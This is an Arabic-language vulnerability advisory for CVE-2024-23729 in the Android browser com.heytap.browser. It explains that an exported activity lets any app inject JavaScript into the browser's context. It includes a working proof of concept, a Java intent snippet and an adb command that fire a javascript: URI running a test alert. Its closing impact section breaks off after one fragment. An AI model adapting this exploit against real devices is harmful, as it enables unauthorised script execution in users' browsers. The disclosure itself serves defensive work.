
CVE-2024-23729
تم اكتشاف ثغرة أمنية في تطبيق com.heytap.browser على نظام Android. تسمح الثغرة لمهاجم بتنفيذ كود JavaScript تعسفي ضمن سياق التطبيق دون أي أذونات.
com.heytap.browserنشاط com.android.browser.RealBrowserActivity في تطبيق com.heytap.browser هو نشاط مُصدر ويمكن استدعاؤه من قبل أي تطبيق تابع لجهة خارجية دون الحاجة إلى أي أذونات. يمكن لتطبيق ضار استغلال ذلك لتنفيذ كود JavaScript تعسفي ضمن سياق تطبيق com.heytap.browser.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

الاستغلال الناجح يسمح للمهاجم بـ:
com.heytap.browser.